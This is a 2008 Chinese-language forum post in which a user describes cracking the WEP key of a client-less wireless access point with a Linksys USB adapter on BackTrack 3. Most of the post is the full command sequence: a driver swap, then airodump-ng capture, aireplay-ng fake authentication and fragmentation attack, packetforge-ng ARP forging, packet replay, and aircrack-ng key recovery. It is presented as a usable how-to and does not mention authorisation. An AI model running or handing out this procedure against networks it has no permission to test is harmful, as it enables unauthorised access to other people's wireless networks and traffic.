上等兵
- 注册时间
- 2008-9-5
- 金币
- 48 个
- 威望
- 7 个
- 荣誉
- 1 个
尚未签到
|
新买了个Linksys WUSB54GC的usb无线网卡,在论坛里找不到破解无客户端wep密码的方法,只好去网上找。经过3天的努力,今天终于破解成功。
BT3自带的驱动不支持fragmentation attack,下载WUSB54GC新驱动
http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-2.0.1.tar.bz2
可以在xp下用winrar解压缩rt73-k2wrlz-2.0.1.tar.bz2文件
把压缩文件里面的整个Module目录复制到root下
新建一个shell窗口,更换BT3 Final版自带的rt73驱动(下面两个方法都需要做这一步)
方法一:使用BT3 final版自带的spoonwep工具破解
在shell窗口输入 spoonwep
填好要破解AP的Mac地址,选择好使用的无线网卡、频道和破解方式,最后点击LAUNCH按键进行破解,如下图
方法二:使用“-1,-5”命令破解密码
返回root目录: cd ..
输入命令: airodump-ng --ivs -w name -c 6 rausb0
新建第二个shell窗口,
输入命令: ifconfig 查看无线网卡的mac地址
输入命令: aireplay-ng -1 0 -a AP的mac -h 无线网卡的mac rausb0
输入命令: aireplay-ng -5 -b AP的mac -h 无线网卡的mac rausb0
系统回显use this packet?时输入y回车,开始注入,一段时间后得到重要的fragment-xxxx-xxxxxx.xor文件
输入命令: packetforge-ng -0 -a AP的mac -h 无线网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w myarp
输入命令: aireplay-ng -2 -r myarp rausb0
系统回显use this packet?输入y回车,第一个shell窗口里的#Data开始猛涨
新建第三个shell窗口,当#Data到3万多个后
输入命令: ls -l 找出最新的*.ivs文件,然后
输入命令: aircrack-ng name-01.ivs 破解密码(密码位数自动识别)
[ 本帖最后由 dk_wong 于 2008-9-13 14:01 编辑 ] |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
x
评分
-
2
查看全部评分
-
|